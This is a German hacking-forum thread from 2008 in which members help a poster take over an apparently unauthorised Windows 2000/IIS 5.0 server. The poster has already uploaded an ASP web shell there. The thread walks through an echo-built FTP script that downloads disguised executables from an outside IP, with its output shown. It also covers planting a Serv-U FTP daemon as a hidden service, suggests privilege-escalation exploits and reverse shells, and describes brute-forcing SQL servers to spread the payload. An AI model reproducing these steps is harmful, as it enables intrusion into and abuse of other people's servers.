#1 26. Januar 2008 Hallo ich brauche Hilfe wie man den im Titel genannten Server hackt habe grad zu einem Server FTP Zugang habe ne .ASP Schell(PHP nicht installiert) hochgeladen und hab die dann über http geöffnet kann jetzt schon Verzeichnisse und Festplatten switchen komm überall rein kann sachen Downloaden Uploaden etc. aber nur über die Shell mit dem FTP bleib ich nur im "ftp-root" Folgene Ports sind geöffnet: 21 3389 443 25 80 445 135 1026 1025 scheint das MSSQL oder RemoteDesktop nicht aktiviert ist und wenn dann auf einen anderen Port. Habe schon bei Milw0rm geschaut aber nichts ansprechendes gefunden. könnt ihr mir helfen? + Multi-Zitat Zitieren
#2 27. Januar 2008 AW: WIN 2000 Server/IIS 5.0 hacken Wenn du ne gute ASP-Shell hast, kannste doch über die Befehle ausführen Afaik gibts Exploits für IIS 5.0, außerdem gibts das neue RPC-Exploit für Win2k, das kannste mal probieren. RemoteDesktop dürfte normalerweiße aktiviert sein, da port 3389 auf is. 445, 135, 1025, 1026 sind alles RPC-Ports. + Multi-Zitat Zitieren
#3 27. Januar 2008 AW: WIN 2000 Server/IIS 5.0 hacken Tach. Also gib mir den Server bzw die Shell und ich installier dir dein FTPD... Wenn du Pech hast, ist aber der FTPD dann nicht mit "root Rechten" gestartet, sodass der FTPD bei jedem Reboot des Servers aus ist. Und außerdem wirst du in diesem Falle keine Passworthashes ziehen können und nichts mit der net oder net1 machen können, da du keine Rechte dafür hast. brauchst dann nen local privileg exploit für win2k. oder halt bissel hirn um was anderes zu machen muhaha naja wayne... + Multi-Zitat Zitieren
#4 27. Januar 2008 AW: WIN 2000 Server/IIS 5.0 hacken eine shell hab ich drauf gemacht aber nur eine auf Türkisch die versteh erstens nicht richtig und zweitens funktioniert die nur teilweise hat danoch jmd. eine vernünftige (englisch)? An ein RPC Exploit hab ich auch schon gedacht aber ich komme damit nicht klar hab mir dieses hier "ausgesucht" aber ich weiß nicht wie ich das Exploit ausführen soll hatte gedacht dass, das ein PHP Xploit ist aber es lässt sich nicht ausführen und ein Perl scheint es ja auch nicht zu sein für IIS 5.0 weiß ich nicht welches Exploit ich nehmen soll würde das gerne auch alleine hinkriegen wär dann nähmlich mein erster eigener Str0 und der steht in der Schweiz^^ + Multi-Zitat Zitieren
#5 27. Januar 2008 Zuletzt von einem Moderator bearbeitet: 14. April 2017 AW: WIN 2000 Server/IIS 5.0 hacken kannst die shell mal probieren: No File | xup.in kp ob die gut ist, hab die erst einmal kurz ausprobiert, aber n versuch ist es ja wert + Multi-Zitat Zitieren
#6 27. Januar 2008 AW: WIN 2000 Server/IIS 5.0 hacken @roadkiller danke für deine shell hab die gleich mal ausprobiert hat nicht viele Funktionen aber egal wichtig ist sie kann sachen ausführen aber ich weiß nicht was ich da zum beiscpil ausführen soll kann ich SerVu hochladen oder geht das nicht weil da ja schon ein ftp installiert ist? + Multi-Zitat Zitieren
#7 27. Januar 2008 AW: WIN 2000 Server/IIS 5.0 hacken klar kannst du da ne servu hochladen, die muss dann halt auf n andern port laufen als der ftp. Falls du noch Probleme hast kannst du mich gerne per PN kontaktieren. + Multi-Zitat Zitieren
#8 28. Januar 2008 AW: WIN 2000 Server/IIS 5.0 hacken hab jetzt mal versucht serv-u hochzuladen da kommt dieser fehler raus habs mal ganz genau gemacht damits auch sicher klappt Commands: echo >> c:\windows.txt echo open 200.32.77.77 21 >> c:\windows.txt echo user anonymous >> c:\windows.txt echo bill@online.de >> c:\windows.txt echo binary >> c:\windows.txt echo get MSIntskmngr.exe >> c:\windows.txt echo get mspaintfixd.tmp >> c:\windows.txt echo quit >> c:\windows.txt type c:\windows.txt: ECHO is on. open 200.32.77.77 21 user anonymous bill@online.de binary get MSIntskmngr.exe get mspaintfixd.tmp quit Ergebnis: Invalid command. Connected to 200.32.77.77. ECHO is on. open 200.32.77.77 21 220 Microsoft FTP Service user anonymous 331 Anonymous access allowed, send identity (e-mail name) as password. 230 Anonymous user logged in. Invalid command. binary 200 Type set to I. get MSIntskmngr.exe get mspaintfixd.tmp quit 221 ich weiß nicht weiter + Multi-Zitat Zitieren
#9 28. Januar 2008 AW: WIN 2000 Server/IIS 5.0 hacken Das ist ein c script wenn du linux hast gcc script.c -o script Unter Windows brauchste halt nen C-Compiler. Ich denke eh das dein IIS auf minimalen Rechten läuft und du so mit deiner Shell nich weiterkommst. Aber wenn du Daten auslesenkannst würde ich versuchen an wichtige Daten zu kommen um den Server zu übernehmen. Mit deiner asp shell alleine wirste wohl net unter solchen umständen weit kommen. + Multi-Zitat Zitieren
#10 28. Januar 2008 AW: WIN 2000 Server/IIS 5.0 hacken hab zwar kein linux aber ein linuxroot mit shellzugriff kann ich das Exploit dann einfach durch eingaben von "gcc script.c -o script" executen? + Multi-Zitat Zitieren
#11 28. Januar 2008 AW: WIN 2000 Server/IIS 5.0 hacken dadurch compilierst du es, danach kannst du es ausführen ./script +paramater // bzw kannste auch zb cygwin benutzen + Multi-Zitat Zitieren
#12 28. Januar 2008 AW: WIN 2000 Server/IIS 5.0 hacken ok danke das werd ich dann mal ausprobieren Hat jmd ne Idee zu meinen Problem mit dem "Stro Bau" + Multi-Zitat Zitieren
#13 28. Januar 2008 AW: WIN 2000 Server/IIS 5.0 hacken aber wäre ein ziemlich großer zufall wenn dein server vuln gegen genau dies exploit ist wollt ich nur nochmal sagen ^^ + Multi-Zitat Zitieren
#14 28. Januar 2008 AW: WIN 2000 Server/IIS 5.0 hacken also exploiten mach ich jetzt nicht möchhte erst mal den str0 hinkriegen aber egal was ich auch bei der "echo-Methode" tue es funktionirt nicht es kommt immer das raus: Invalid command. Connected to 200.32.77.77. ECHO is on. open 200.32.77.77 21 220 Microsoft FTP Service user anonymous 331 Anonymous access allowed, send identity (e-mail name) as password. 230 Anonymous user logged in. Invalid command. binary 200 Type set to I. get msintskmngr.exe get mspaintfixd.tmp quit 221 EDIT: hab jetzt die files einfach ins ftp verzeichnis gehauen und das geht musste jetzt nur noch aus führen aber da ist das nächste problem das file braucht ewig um ausgeführt zu werden hab das mal ganz lange laufen gelassen(also den command über shell) aber es passierte nichts eigentlich müsste das doch innnerhalb von secunden ausführen oder? + Multi-Zitat Zitieren
#15 31. Januar 2008 AW: WIN 2000 Server/IIS 5.0 hacken *Push* Also ich habe den Server bisher immer noch nicht unter der kontrolle habe jetzt die Serv-U Dateien hochgeladen aber ich krieg den Server nicht gestartet und ich krieg das einfach nicht hin obwohl es so einfach scheint Suche jmd. der mir den letzten Schritt macht und den Serv-u ausführt habe Roadkiller schon kontaktiert aber der antwortet mir nicht oder ist einfach nicht on also wenn mir jmd helfen möchte;( sehr gerne sonst komm ich wohl nicht weiter Wie gesagt hab ne schell hochgeladn konnte den get befehl wahrscheinlich nicht ausführen hab den deshalb über offen(anonymouse) ftp hochgeladen mit schell ins richtige verzeichnis getan und wollte das dann über schell ausführen aber egal was ich auch mache: "start C:\msintskmngr.exe" , "c:\msintskmngr.exe /i" "net start "Windows Secure" ich krieg ihn einfach nicht gestartet + Multi-Zitat Zitieren
#16 3. Februar 2008 AW: WIN 2000 Server/IIS 5.0 hacken so kann closed werden... hab sein problem gelöst ^^ nun isser glücklich ^^ =)=)=) + Multi-Zitat Zitieren
#17 3. Februar 2008 AW: WIN 2000 Server/IIS 5.0 hacken würde mich juken wie du es gelöst hast... haste deinen ftp raufgeladen und via asp script gestartet? weil dann is der ftpa bekanntermaaßen net als dienst an weil mann meist keine admin rechte hat.. gibt aber ne mögluichkeit sich ne admin shell zu zaubern. deine vorgehensweise würde mich mal interessieren =) mfg milles + Multi-Zitat Zitieren
#18 3. Februar 2008 AW: WIN 2000 Server/IIS 5.0 hacken ne habs net als dienst gestartet, aber ihm gehts ja drum, dass er scannen kann. kann er jetzt. ps: ist win2k sp4 --> also local privileg exploit per reverse shell sollte da abhilfe schaffen. nur ich bin nicht mädchen für alles mfg halloweenracer + Multi-Zitat Zitieren
#19 4. Februar 2008 AW: WIN 2000 Server/IIS 5.0 hacken hab noch eine Frage habe jetzt nachdem ich den stro hatte(danke nochmal an Halloweenracer für die Hilfe) gleich mit dem scannen angefangen habe auch gleich massig results gehabt nach dem bruten und ausprobieren hatte ich gleich sql´s ohne sql error hab dann halt per echo die dateien(Serv-u) hochgeladen und wollte die dann starten das Starten über "c:\windows\system32\xxxx.exe /i" ging noch aber das zufügen zu den Diensten mit "NET Start Server Backup" antwortete mit "El nombre de servicio no es válido." das ist Spanisch und heißt das der Name des Services nicht valid bzw. nicht erlaubt ist ich weiß nicht weiter den dort läuft kein AV und ich hab das jetzt schon bei mehrern servern geprüft und da kam das gleiche wenn auch auf Englisch kann mir jmd. helfen mach ich da irgenwas falsch? + Multi-Zitat Zitieren
#20 8. Februar 2008 AW: WIN 2000 Server/IIS 5.0 hacken bei leerzeichen im namen: net start "Server Backup" + Multi-Zitat Zitieren
#21 8. Februar 2008 AW: WIN 2000 Server/IIS 5.0 hacken musst den short-servicename nehmen.. also zB serv-u... oder halt das "server backup" in anführungszeichen setzen.. also wie Pyro das in der letzten Zeile hat.. + Multi-Zitat Zitieren